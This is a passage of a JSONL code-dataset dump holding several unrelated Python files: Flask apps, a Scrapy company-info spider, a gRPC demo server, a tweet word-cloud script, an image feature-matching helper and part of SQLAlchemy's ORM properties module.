flash(\"提交成功!\", \"ok\")\n useroplog = Useroplog(\n user_id=session[\"user_id\"],\n ip=request.remote_addr,\n reason=reason,\n )\n db.session.add(useroplog)\n db.session.commit()\n return redirect(url_for(\"home.report_month\"))\n return render_template(\"home/month_edit.html\", form=form, data_dict=data_dict, cost=cost)\n\n\n","sub_path":"app/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"257763921","text":"from Helper import read_input_split_by\n\ninput = [group.split('\\n') for group in read_input_split_by('Inputday6.txt', '\\n\\n')]\n\ntotal_sum = 0\nfor group in input:\n letters = {}\n for i in range(26):\n letters[chr(ord('a') + i)] = True\n\n for letter in letters:\n for member in group:\n if letter not in member:\n letters[letter] = False\n\n total_sum += sum(letter == True for letter in letters.values())\n\nprint(total_sum)\n","sub_path":"Day6b.py","file_name":"Day6b.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"193158845","text":"#!/usr/bin/env python\nimport os\n\nfrom flask.ext.script import Manager, Server\nfrom flask.ext.migrate import Migrate, MigrateCommand\nfrom wut4lunch import create_app\nfrom wut4lunch.models import db, User, Lunch\n\n# default to dev config because no one should use this in\n# production anyway\nenv = os.environ.get('APPNAME_ENV', 'dev')\napp = create_app('wut4lunch.settings.%sConfig' % env.capitalize(), env=env)\n\nmanager = Manager(app)\nmanager.add_command(\"server\", Server())\n\nmigrate = Migrate(app, db)\nmanager.add_command(\"db\", MigrateCommand)\n\n\n@manager.shell\ndef make_shell_context():\n \"\"\" Creates a python REPL with several default imports\n in the context of the app\n \"\"\"\n\n return dict(app=app, db=db, User=User, Lunch=Lunch)\n\n\n@manager.command\ndef createdb():\n \"\"\" Creates a database with all of the tables defined in\n your Alchemy models\n \"\"\"\n\n db.create_all()\n\nif __name__ == \"__main__\":\n manager.run()\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"13799650","text":"# -*- coding: utf-8 -*-\nimport urllib\n\nimport scrapy\n\nfrom companys_info.items import BusinessInfoItem, InfoItemLoader\nfrom companys_info.settings import DEFAULT_REQUEST_HEADERS, headers2\n\n\nclass CompanysSpider(scrapy.Spider):\n name = \"companys\"\n allowed_domains = [\"tianyancha.com\"]\n start_urls = (\n 'http://www.tianyancha.com/',\n )\n\n company_name = ''\n new_url = None\n url = None\n\n def start_requests(self):\n with open(\"company_list\", \"r\") as f:\n for obj in f:\n DEFAULT_REQUEST_HEADERS[\"Referer\"] = \"https://www.tianyancha.com/\"\n self.company_name = obj\n print(self.company_name.split())\n # businessinfo_item = BusinessInfoItem()\n # businessinfo_item[\"search_name\"] = self.company_name.split()\n\n self.url = \"http://www.tianyancha.com/search?key=%s\" % (urllib.parse.quote(self.company_name))\n yield scrapy.Request(self.url, headers=DEFAULT_REQUEST_HEADERS,\n callback=self.parse_page, dont_filter=True)\n\n def parse_page(self, response):\n headers2[\"Referer\"] = self.url\n\n detail_url = response.xpath(\"//*[@id='web-content']/div/div[1]/div/div[3]/div[1]/div[2]/div[1]/a/@href\").extract_first()\n\n\n\n # item_local = BusinessInfoItemLoader(item=CompanysInfoItem(), response=response)\n # item_local.add_xpath()\n # companys_info_item = item_local.load_item()\n # yield companys_info_item\n\n if detail_url:\n # parse_url = detail_url.encode('utf-8')\n DEFAULT_REQUEST_HEADERS[\"Referer\"] = detail_url\n yield scrapy.Request(\n url=detail_url,\n headers=DEFAULT_REQUEST_HEADERS,\n callback=self.parse_detail\n\n )\n\n\n def parse_detail(self, response):\n # businessinfo_item = BusinessInfoItem()\n item_local = InfoItemLoader(item=BusinessInfoItem(), response=response)\n\n # search_name = scrapy.Field()\n # legal_representative = scrapy.Field() # 法定代表人\n # registered_capital = scrapy.Field() # 注册资本\n # registration_time = scrapy.Field() # 注册时间\n # company_status = scrapy.Field() # 公司状态\n # equity_structure = scrapy.Field() # 股权结构,要开通\n # registration_number = scrapy.Field() # 工商注册号\n # credit_code = scrapy.Field() # 统一信用代码\n # agency_code = scrapy.Field() # 组织机构代码\n # type_of_company = scrapy.Field() # 公司类型\n # identification_number = scrapy.Field() # 纳税人识别号\n # industry = scrapy.Field() # 行业\n # operating_period = scrapy.Field() # 营业期限\n # approval_date = scrapy.Field() # 核准日期\n # registration_authority = scrapy.Field() # 登记机关\n # english_name = scrapy.Field() # 英文名称\n # registered_address = scrapy.Field() # 注册地址\n # business_scope = scrapy.Field() # 经营范围\n\n # 规则\n item_local.add_xpath(\"legal_representative\", \"//div[@class='humancompany']//a/text()\")\n item_local.add_xpath(\"registered_capital\", \"//table[@class='table']//tr[1]/td[2]/div[2]/@title\")\n\n\n #todo\n item_local.add_xpath(\"registration_time\",\n \"//*[@id='_container_baseInfo']/table[1]/tbody/tr[2]/td/div[2]/text()\") # js要改\n item_local.add_xpath(\"company_status\", \"//div[@class='num-opening']/text()\")\n # item_local.add_xpath(\"equity_structure\", \"//div[@class='num-opening']/text()\")# 股权结构,要开通\n item_local.add_xpath(\"registration_number\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[1]/td[2]/text()\")\n item_local.add_xpath(\"credit_code\",\n \"//*[@id='_container_baseInfo']/table[2]/tbody/tr[2]/td[2]/text()\")\n item_local.add_xpath(\"agency_code\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[1]/td[4]/text()\")\n item_local.add_xpath(\"type_of_company\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[2]/td[4]/text()\")\n # item_local.add_xpath(\"identification_number\", \"\") #跟纳税人识别号一样\n item_local.add_xpath(\"industry\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[3]/td[4]/text()\")\n item_local.add_xpath(\"operating_period\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[4]/td[2]/span/text()\")\n\n #todo\n item_local.add_xpath(\"approval_date\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[4]/td[4]/text/text()\") # js要该\n item_local.add_xpath(\"registration_authority\", \"//*[@id='_container_baseInfo']/table[2]/tbody/tr[6]/td[4]/text()\")\n # item_local.add_xpath(\"english_name\", \"\")\n item_local.add_xpath(\"registered_address\", \"//*[@id='_container_baseInfo']/table[2]/tbody/tr[8]/td[2]/text()\")\n item_local.add_xpath(\"business_scope\", \"//span[@class='js-split-container']/text()\")\n\n businessinfo_item = item_local.load_item()\n\n yield businessinfo_item\n","sub_path":"companys_info/spiders/companys.py","file_name":"companys.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"391511761","text":"from concurrent import futures\r\nimport logging\r\n\r\nimport grpc\r\n\r\nimport hello_pb2\r\nimport hello_pb2_grpc\r\n\r\n\"\"\"\r\nfrom google.protobuf import json_format\r\nreq = json.loads(json_format.MessageToJson(request)) # Convert Request message into Json/Dictionary\r\njson_format.Parse(json.dumps(response), user_pb2.GetUserResponse(), ignore_unknown_fields=False) # Convert Json/Dictionary into Response message\r\n\r\nimport \"google/protobuf/struct.proto\";\r\ngoogle.protobuf.Struct user = 2;\r\n\"\"\"\r\n\r\nclass Greeter(hello_pb2_grpc.GreeterServicer):\r\n\r\n def SayHello(self, request, context):\r\n print(\"Received %s\"% request.name)\r\n return hello_pb2.HelloReply(message='Hello, %s!' % request.name)\r\n\r\n\r\ndef serve():\r\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\r\n hello_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)\r\n server.add_insecure_port('localhost:50051')\r\n server.start()\r\n server.wait_for_termination()\r\n\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig()\r\n print(\"Server listening on port 50051\")\r\n serve()\r\n \r\n \r\n","sub_path":"hello_server.py","file_name":"hello_server.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"459792851","text":"from flask import Flask, request, jsonify, render_template\nfrom datetime import datetime\nimport sqlite3\n\n\n######################## making general sqlite connection #######################\nconn = sqlite3.connect(\"allposts.sqlite\")\ncursor = conn.cursor()\n##################################### end connection ##############################\n\n\n#------------------------------------------------------------------------------\n #creating all posts table\n#------------------------------------------------------------------------------\ncursor.execute(\"CREATE TABLE IF NOT EXISTS posts(id integer PRIMARY KEY, title text NOT NULL, author text NOT NULL, date text NOT NULL, p1 text NOT NULL, p2 text, p3 text)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS news(id integer PRIMARY KEY, title text NOT NULL, author text NOT NULL, date text NOT NULL, p1 text NOT NULL, p2 text, p3 text)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS entertainment(id integer PRIMARY KEY, title text NOT NULL, author text NOT NULL, date text NOT NULL, p1 text NOT NULL, p2 text, p3 text)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS sports(id integer PRIMARY KEY, title text NOT NULL, author text NOT NULL, date text NOT NULL, p1 text NOT NULL, p2 text, p3 text)\")\n\n\n\n\n\n\n\n#-------------------------------------------------------------------------------\n\n\n\n\n\n#-------------------------------------------------------------------------------\n #Convert digital data to binary format\n#-------------------------------------------------------------------------------\ndef convert(filename):\n with open(filename, 'rb') as file:\n image = file.read()\n return image\n#---------------------------------------------------------------------------------\n\n\n\n\n#-------------------------------------------------------------------------------\n # Convert binary data to proper format and write it on Hard Disk\n#-------------------------------------------------------------------------------\ndef reconvert(data, filename):\n with open(filename, 'wb') as file:\n file.write(data)\n print(\"Stored blob data into: \", filename, \"\\n\")\n\n#-------------------------------------------------------------------------------\n\n\n\n\napp = Flask(__name__)\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/postcontent\", methods=['POST','GET'])\ndef postcontent():\n if request.method=='GET':\n return render_template(\"postcontent.html\")\n elif request.method==\"POST\":\n title=request.form['title']\n nameofauthor=request.form['nameofauthor']\n img=request.files['img1']\n ios=img.read()\n content=request.form['content']\n date=datetime.now().strftime(\"%Y, %b %w\")\n conn = sqlite3.connect(\"allposts.sqlite\")\n cursor = conn.cursor()\n news=request.form['news']\n entertainment=request.form['entertainment']\n sports=request.form['sports']\n cursor.execute(\"INSERT INTO posts(title, author, date, p1) VALUES(?,?,?,?)\",(title, nameofauthor, date,content))\n conn.commit()\n ida=cursor.execute(\"SELECT id FROM posts WHERE id=?\", (cursor.lastrowid,))\n photo=reconvert(ios, \"static/blogimages/3.jpg\")\n return img.filename\n\n\n@app.route(\"/\")\ndef apost(id):\n conn=sqlite3.connect('allposts.sqlite')\n cursor=conn.cursor()\n cursor.execute(\"SELECT * FROM posts WHERE id=? \", (id,))\n post=cursor.fetchall()\n ida=f\"{id}\"\n return render_template(\"post.html\", post=post, id=ida)\n\n@app.route(\"/post\", methods=[\"POST\", \"GET\"])\ndef new():\n if request.method==\"GET\":\n conn=sqlite3.connect('allposts.sqlite')\n cursor=conn.cursor()\n cursor.execute(\"SELECT * FROM posts WHERE id=?\", (cursor.lastrowid,))\n ida=cursor.fetchall()\n return f\"{ida}\"\n\n\nif __name__== \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"593000067","text":"#%%\nfrom wordcloud import WordCloud, STOPWORDS\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom tqdm import tqdm\n\nmystops = ['https', 'amp', 't', 'co']\nSTOPWORDS.update(mystops)\n#print(STOPWORDS)\n\n#%%\ndef one_big_string(list_of_tweets):\n mystring = ''\n for tweet in tqdm(list_of_tweets):\n mystring += tweet\n mystring += ' '\n return mystring\n\ndef plot_wordcloud(tweetsdf):\n dem = tweetsdf.loc[tweetsdf['Party'] == 'Democrat', ]\n republican = tweetsdf.loc[tweetsdf['Party'] == 'Republican', ]\n\n tweetsdf = one_big_string(tweetsdf['tweet'])\n dem = one_big_string(dem['tweet'])\n republican = one_big_string(republican['tweet'])\n\n wordcloud = WordCloud(width = 1200, height = 800,\n background_color ='black',\n colormap = 'Blues',\n stopwords = STOPWORDS,\n min_font_size = 10).generate(dem)\n \n # plot the WordCloud image \n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.savefig('../plots/Dem-WordCloud.png')\n\n wordcloud = WordCloud(width = 1200, height = 800,\n background_color ='black',\n colormap = 'Reds',\n stopwords = STOPWORDS,\n min_font_size = 10).generate(republican)\n \n # plot the WordCloud image \n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.savefig('../plots/Rep-WordCloud.png')\n\n wordcloud = WordCloud(width = 1200, height = 800,\n background_color ='black',\n stopwords = STOPWORDS,\n min_font_size = 10).generate(tweetsdf)\n \n # plot the WordCloud image \n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.savefig('../plots/DemRep-WordCloud.png')\n\n return None","sub_path":"IST 738 Project - Political Party Classifier/scripts/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"487076208","text":"#!/usr/bin/env python\n\"\"\"\"\"\n\nTests feature location and tracking\n\"\"\"\"\"\n\nimport math\nimport numpy as np\nimport cv2\nimport sys\nimport random\nfrom drawMatches import drawMatches\n# ---------- map parameters ----------- #\n\nMAP_PIXEL_WIDTH = 1155 # in pixel\nMAP_PIXEL_HEIGHT = 847\nMAP_REAL_WIDTH = 1.1 # in meter\nMAP_REAL_HEIGHT = .76\n# -------------------------- #\n\n# ----- camera parameters DO NOT EDIT ----- #\nCAMERA_WIDTH = 320\nCAMERA_HEIGHT = 240\nCAMERA_CENTER = np.float32([(CAMERA_WIDTH - 1) / 2., (CAMERA_HEIGHT - 1) / 2.]).reshape(-1, 1, 2)\nCAMERA_SCALE = 290.\nMETER_TO_PIXEL = (float(MAP_PIXEL_WIDTH) / MAP_REAL_WIDTH + float(MAP_PIXEL_HEIGHT) / MAP_REAL_HEIGHT) / 2.\n# ----------------------------- #\n\n# ----- feature parameters DO NOT EDIT ----- #\n\nMATCH_RATIO = 0.7\nMIN_MATCH_COUNT = 10 \nPROB_THRESHOLD = 0.001\nMAP_FEATURES = 6000\n# -------------------------- #\n\n\n\nclass Single_Map_Localization:\n \"\"\"\n Single Map for localization.\n \"\"\"\n\n def __init__(self, map_kp, map_des):\n self.map_kp = map_kp\n self.map_des = map_des\n self.map_image=None\n self.cur_image=None\n\n index_params = dict(algorithm=6, table_number=6, key_size=12, multi_probe_level=1)\n search_params = dict(checks=50)\n self.matcher = cv2.FlannBasedMatcher(index_params, search_params)\n\n self.z = 0.33\n #MS Hardcode height of test stand \n self.angle_x = 0.0\n self.angle_y = 0.0\n\n\n def update(self, z, angle_x, angle_y, kp, des):\n \"\"\"\n kp is the position of detected features\n des is the description of detected features\n \"\"\"\n # update parameters\n self.z = z\n self.angle_x = angle_x\n self.angle_y = angle_y\n weights = []\n poses = []\n weights_sum = 0.0\n \n \n p, w = self.compute_location(kp, des, self.map_kp, self.map_des)\n\n \n return p, w\n \n\n def compute_location(self, kp1, des1, kp2, des2):\n \"\"\"\n compute the global location of center of current image\n :param kp1: captured keyPoints\n :param des1: captured descriptions\n :param kp2: map keyPoints\n :param des2: map descriptions\n :return: global pose\n \"\"\"\n\n good = []\n pose = None\n\n if des1 is not None and des2 is not None:\n\n if len(des2) > 0:\n matches = self.matcher.knnMatch(des1, des2, k=2)\n \n for match in matches:\n if len(match) > 1 and match[0].distance < MATCH_RATIO * match[1].distance:\n good.append(match[0])\n\n\n # Need to draw only good matches, so create a mask\n # print 'compute_location'\n gray2 = cv2.cvtColor(self.map_image,cv2.COLOR_BGR2GRAY)\n gray1 = cv2.cvtColor(self.cur_image,cv2.COLOR_BGR2GRAY)\n out = drawMatches(gray1,kp1,gray2,kp2,good)\n cv2.namedWindow('Matches', cv2.WINDOW_NORMAL)\n cv2.imshow('Matches',out)\n\n if len(good) > MIN_MATCH_COUNT:\n\n src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n \n transform = cv2.estimateRigidTransform(src_pts, dst_pts, False)\n \n\n if transform is not None:\n transformed_center = cv2.transform(CAMERA_CENTER, transform) # get global pixel\n transformed_center = [transformed_center[0][0][0] / METER_TO_PIXEL, # map to global pose\n (MAP_PIXEL_HEIGHT - 1 - transformed_center[0][0][1]) / METER_TO_PIXEL]\n yaw = np.arctan2(transform[1, 0], transform[0, 0]) # get global heading\n\n # correct the pose if the drone is not level\n z = math.sqrt(self.z ** 2 / (1 + math.tan(self.angle_x) ** 2 + math.tan(self.angle_y) ** 2))\n offset_x = np.tan(self.angle_x) * z\n offset_y = np.tan(self.angle_y) * z\n global_offset_x = math.cos(yaw) * offset_x + math.sin(yaw) * offset_y\n global_offset_y = math.sin(yaw) * offset_x + math.cos(yaw) * offset_y\n pose = [transformed_center[0] + global_offset_x, transformed_center[1] + global_offset_y, z, yaw]\n \n return pose, len(good)\n\n def set_map_image(self,image):\n self.map_image=image\n def set_cur_image(self,image):\n self.cur_image=image \n\n\ndef create_map(file_name):\n \"\"\"\n create a single feature map presuming map is not much bigger than viewport \n :param file_name: the image of map\n :return: kp and des of map\n \"\"\"\n\n # read image and extract features\n image = cv2.imread(file_name)\n # the edgeThreshold and patchSize can be tuned if the gap between cell is too large\n # MS Did just that, set edgeThreshold from 31 to 8 to get more features\n detector = cv2.ORB_create(nfeatures=MAP_FEATURES, scoreType=cv2.ORB_FAST_SCORE, edgeThreshold=8)\n #kp = detector.detect(image, None)\n kp, des = detector.detectAndCompute(image, None)\n \n # MS Debug\n img_keypoints = np.empty((image.shape[0], image.shape[1], 3), dtype=np.uint8)\n # print len(kp)\n cv2.drawKeypoints(image, kp, img_keypoints)\n cv2.namedWindow('Static map', cv2.WINDOW_NORMAL)\n cv2.imshow('Static map',img_keypoints)\n map_image=image \n return kp, des, image\n\n\n\n","sub_path":"In Class/single_map_helper_monitor.py","file_name":"single_map_helper_monitor.py","file_ext":"py","file_size_in_byte":5524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"630802799","text":"# orm/properties.py\n# Copyright (C) 2005-2022 the SQLAlchemy authors and contributors\n# \n#\n# This module is part of SQLAlchemy and is released under\n# the MIT License: https://www.opensource.org/licenses/mit-license.php\n\n\"\"\"MapperProperty implementations.\n\nThis is a private module which defines the behavior of individual ORM-\nmapped attributes.\n\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom typing import Any\nfrom typing import cast\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\nfrom typing import TypeVar\n\nfrom . import attributes\nfrom . import strategy_options\nfrom .base import SQLCoreOperations\nfrom .descriptor_props import Composite\nfrom .descriptor_props import ConcreteInheritedProperty\nfrom .descriptor_props import Synonym\nfrom .interfaces import _IntrospectsAnnotations\nfrom .interfaces import _MapsColumns\nfrom .interfaces import MapperProperty\nfrom .interfaces import PropComparator\nfrom .interfaces import StrategizedProperty\nfrom .relationships import Relationship\nfrom .util import _extract_mapped_subtype\nfrom .util import _orm_full_deannotate\nfrom .. import exc as sa_exc\nfrom .. import ForeignKey\nfrom .. import log\nfrom .. import sql\nfrom .. import util\nfrom ..sql import coercions\nfrom ..sql import roles\nfrom ..sql import sqltypes\nfrom ..sql.schema import Column\nfrom ..util.typing import de_optionalize_union_types\nfrom ..util.typing import de_stringify_annotation\nfrom ..util.typing import is_fwd_ref\nfrom ..util.typing import NoneType\n\n_T = TypeVar(\"_T\", bound=Any)\n_PT = TypeVar(\"_PT\", bound=Any)\n\n__all__ = [\n \"ColumnProperty\",\n \"Composite\",\n \"ConcreteInheritedProperty\",\n \"Relationship\",\n \"Synonym\",\n]\n\n\n@log.class_logger\nclass ColumnProperty(\n _MapsColumns[_T],\n StrategizedProperty[_T],\n _IntrospectsAnnotations,\n log.Identified,\n):\n \"\"\"Describes an object attribute that corresponds to a table column.\n\n Public constructor is the :func:`_orm.column_property` function.\n\n \"\"\"\n\n strategy_wildcard_key = strategy_options._COLUMN_TOKEN\n inherit_cache = True\n _links_to_entity = False\n\n __slots__ = (\n \"_orig_columns\",\n \"columns\",\n \"group\",\n \"deferred\",\n \"instrument\",\n \"comparator_factory\",\n \"descriptor\",\n \"active_history\",\n \"expire_on_flush\",\n \"doc\",\n \"_creation_order\",\n \"_is_polymorphic_discriminator\",\n \"_mapped_by_synonym\",\n \"_deferred_column_loader\",\n \"_raise_column_loader\",\n \"_renders_in_subqueries\",\n \"raiseload\",\n )\n\n def __init__(\n self, column: sql.ColumnElement[_T], *additional_columns, **kwargs\n ):\n super(ColumnProperty, self).__init__()\n columns = (column,) + additional_columns\n self._orig_columns = [\n coercions.expect(roles.LabeledColumnExprRole, c) for c in columns\n ]\n self.columns = [\n _orm_full_deannotate(\n coercions.expect(roles.LabeledColumnExprRole, c)\n )\n for c in columns\n ]\n self.parent = self.key = None\n self.group = kwargs.pop(\"group\", None)\n self.deferred = kwargs.pop(\"deferred\", False)\n self.raiseload = kwargs.pop(\"raiseload\", False)\n self.instrument = kwargs.pop(\"_instrument\", True)\n self.comparator_factory = kwargs.pop(\n \"comparator_factory\", self.__class__.Comparator\n )\n self.descriptor = kwargs.pop(\"descriptor\", None)\n self.active_history = kwargs.pop(\"active_history\", False)\n self.expire_on_flush = kwargs.pop(\"expire_on_flush\", True)\n\n if \"info\" in kwargs:\n self.info = kwargs.pop(\"info\")\n\n if \"doc\" in kwargs:\n self.doc = kwargs.pop(\"doc\")\n else:\n for col in reversed(self.columns):\n doc = getattr(col, \"doc\", None)\n if doc is not None:\n self.doc = doc\n break\n else:\n self.doc = None\n\n if kwargs:\n raise TypeError(\n \"%s received unexpected keyword argument(s): %s\"\n % (self.__class__.__name__, \", \".join(sorted(kwargs.keys())))\n )\n\n util.set_creation_order(self)\n\n self.strategy_key = (\n (\"deferred\", self.deferred),\n (\"instrument\", self.instrument),\n )\n if self.raiseload:\n self.strategy_key += ((\"raiseload\", True),)\n\n def declarative_scan(\n self, registry, cls, key, annotation, is_dataclass_field\n ):\n column = self.columns[0]\n if column.key is None:\n column.key = key\n if column.name is None:\n column.name = key\n\n @property\n def mapper_property_to_assign(self) -> Optional[\"MapperProperty[_T]\"]:\n return self\n\n @property\n def columns_to_assign(self) -> List[Column]:\n return [\n c\n for c in self.columns\n if isinstance(c, Column) and c.table is None\n ]\n\n def _memoized_attr__renders_in_subqueries(self):\n return (\"deferred\", True) not in self.strategy_key or (\n self not in self.parent._readonly_props\n )\n\n @util.preload_module(\"sqlalchemy.orm.state\", \"sqlalchemy.orm.strategies\")\n def _memoized_attr__deferred_column_loader(self):\n state = util.preloaded.orm_state\n strategies = util.preloaded.orm_strategies\n return state.InstanceState._instance_level_callable_processor(\n self.parent.class_manager,\n strategies.LoadDeferredColumns(self.key),\n self.key,\n )\n\n @util.preload_module(\"sqlalchemy.orm.state\", \"sqlalchemy.orm.strategies\")\n def _memoized_attr__raise_column_loader(self):\n state = util.preloaded.orm_state\n strategies = util.preloaded.orm_strategies\n return state.InstanceState._instance_level_callable_processor(\n self.parent.class_manager,\n strategies.LoadDeferredColumns(self.key, True),\n self.key,\n )\n\n def __clause_element__(self):\n \"\"\"Allow the ColumnProperty to work in expression before it is turned\n into an instrumented attribute.\n \"\"\"\n\n return self.expression\n\n @property\n def expression(self):\n \"\"\"Return the primary column or expression for this ColumnProperty.\n\n E.g.::\n\n\n class File(Base):\n # ...\n\n name = Column(String(64))\n extension = Column(String(8))\n filename = column_property(name + '.' + extension)\n path = column_property('C:/' + filename.expression)\n\n .. seealso::\n\n :ref:`mapper_column_property_sql_expressions_composed`\n\n \"\"\"\n return self.columns[0]\n\n def instrument_class(self, mapper):\n if not self.instrument:\n return\n\n attributes.register_descriptor(\n mapper.class_,\n self.key,\n comparator=self.comparator_factory(self, mapper),\n parententity=mapper,\n doc=self.doc,\n )\n\n def do_init(self):\n super().do_init()\n\n if len(self.columns) > 1 and set(self.parent.primary_key).issuperset(\n self.columns\n ):\n util.warn(\n (\n \"On mapper %s, primary key column '%s' is being combined \"\n \"with distinct primary key column '%s' in attribute '%s'. \"\n \"Use explicit properties to give each column its own \"\n \"mapped attribute name.\"\n )\n % (self.parent, self.columns[1], self.columns[0], self.key)\n )\n\n def copy(self):\n return ColumnProperty(\n deferred=self.deferred,\n group=self.group,\n active_history=self.active_history,\n *self.columns,\n )\n\n def _getcommitted(\n self, state, dict_, column, passive=attributes.PASSIVE_OFF\n ):\n return state.get_impl(self.key).get_committed_value(\n state, dict_, passive=passive\n )\n\n def merge(\n self,\n session,\n source_state,\n source_dict,\n dest_state,\n dest_dict,\n load,\n _recursive,\n _resolve_conflict_map,\n ):\n if not self.instrument:\n return\n elif self.key in source_dict:\n value = source_dict[self.key]\n\n if not load:\n dest_dict[self.key] = value\n else:\n impl = dest_state.get_impl(self.key)\n impl.set(dest_state, dest_dict, value, None)\n elif dest_state.has_identity and self.key not in dest_dict:\n dest_state._expire_attributes(\n dest_dict, [self.key], no_loader=True\n )\n\n class Comparator(util.MemoizedSlots, PropComparator[_PT]):\n \"\"\"Produce boolean, comparison, and other operators for\n :class:`.ColumnProperty` attributes.\n\n See the documentation for :class:`.PropComparator` for a brief\n overview.\n\n .. seealso::\n\n :class:`.PropComparator`\n\n :class:`.ColumnOperators`\n\n :ref:`types_operators`\n\n :attr:`.TypeEngine.comparator_factory`\n\n \"\"\"\n\n __slots__ = \"__clause_element__\", \"info\", \"expressions\"\n\n def _orm_annotate_column(self, column):\n \"\"\"annotate and possibly adapt a column to be returned\n as the mapped-attribute exposed version of the column.\n\n The column in this context needs to act as much like the\n column in an ORM mapped context as possible, so includes\n annotations to give hints to various ORM functions as to\n the source entity of this column. It also adapts it\n to the mapper's with_polymorphic selectable if one is\n present.\n\n \"\"\"\n\n pe = self._parententity\n annotations = {\n \"entity_namespace\": pe,\n \"parententity\": pe,\n \"parentmapper\": pe,\n \"proxy_key\": self.prop.key,\n }\n\n col = column\n\n # for a mapper with polymorphic_on and an adapter, return\n # the column against the polymorphic selectable.\n # see also orm.util._orm_downgrade_polymorphic_columns\n # for the reverse operation.\n if self._parentmapper._polymorphic_adapter:\n mapper_local_col = col\n col = self._parentmapper._polymorphic_adapter.traverse(col)\n\n # this is a clue to the ORM Query etc. that this column\n # was adapted to the mapper's polymorphic_adapter. the\n # ORM uses this hint to know which column its adapting.\n annotations[\"adapt_column\"] = mapper_local_col\n\n return col._annotate(annotations)._set_propagate_attrs(\n {\"compile_state_plugin\": \"orm\", \"plugin_subject\": pe}\n )\n\n def _memoized_method___clause_element__(self):\n if self.adapter:\n return self.adapter(self.prop.columns[0], self.prop.key)\n else:\n return self._orm_annotate_column(self.prop.columns[0])\n\n def _memoized_attr_info(self):\n \"\"\"The .info dictionary for this attribute.\"\"\"\n\n ce = self.__clause_element__()\n try:\n return ce.info\n except AttributeError:\n return self.prop.info\n\n def _memoized_attr_expressions(self):\n \"\"\"The full sequence of columns referenced by this\n attribute, adjusted for any aliasing in progress.\n\n .. versionadded:: 1.3.17\n\n \"\"\"\n if self.adapter:\n return [\n self.adapter(col, self.prop.key)\n for col in self.prop.columns\n ]\n else:\n return [\n self._orm_annotate_column(col) for col in self.prop.columns\n ]\n\n def _fallback_getattr(self, key):\n \"\"\"proxy attribute access down to the mapped column.\n\n this allows user-defined comparison methods to be accessed.\n \"\"\"\n return getattr(self.__clause_element__(), key)\n\n def operate(self, op, *other, **kwargs):\n return op(self.__clause_element__(), *other, **kwargs)\n\n def reverse_operate(self, op, other, **kwargs):\n col = self.__clause_element__()\n return op(col._bind_param(op, other), col, **kwargs)\n\n def __str__(self):\n if not self.parent or not self.key:\n return object.__repr__(self)\n return str(self.parent.class_.__name__) + \".\" + self.key\n\n\nclass MappedColumn(\n SQLCoreOperations[_T],\n _IntrospectsAnnotations,\n _MapsColumns[_T],\n):\n \"\"\"Maps a single :class:`_schema.Column` on a class.\n\n :class:`_orm.MappedColumn` is a specialization of the\n :class:`_orm.ColumnProperty` class and is oriented towards declarative\n configuration.\n\n To construct :class:`_orm.MappedColumn` objects, use the\n :func:`_orm.mapped_column` constructor function.\n\n .. versionadded:: 2.0\n\n\n \"\"\"\n\n __slots__ = (\n \"column\",\n \"_creation_order\",\n \"foreign_keys\",\n \"_has_nullable\",\n \"deferred\",\n )\n\n deferred: bool\n column: Column[_T]\n foreign_keys: Optional[Set[ForeignKey]]\n\n def __init__(self, *arg, **kw):\n self.deferred = kw.pop(\"deferred\", False)\n self.column = cast(\"Column[_T]\", Column(*arg, **kw))\n self.foreign_keys = self.column.foreign_keys\n self._has_nullable = \"nullable\" in kw\n util.set_creation_order(self)\n\n def _copy(self, **kw):\n new = self.__class__.__new__(self.__class__)\n new.column = self.column._copy(**kw)\n new.deferred = self.deferred\n new.foreign_keys = new.column.foreign_keys\n new._has_nullable = self._has_nullable\n util.set_creation_order(new)\n return new\n\n @property\n def mapper_property_to_assign(self) -> Optional[\"MapperProperty[_T]\"]:\n if self.deferred:\n return ColumnProperty(self.column, deferred=True)\n else:\n return None\n\n @property\n def 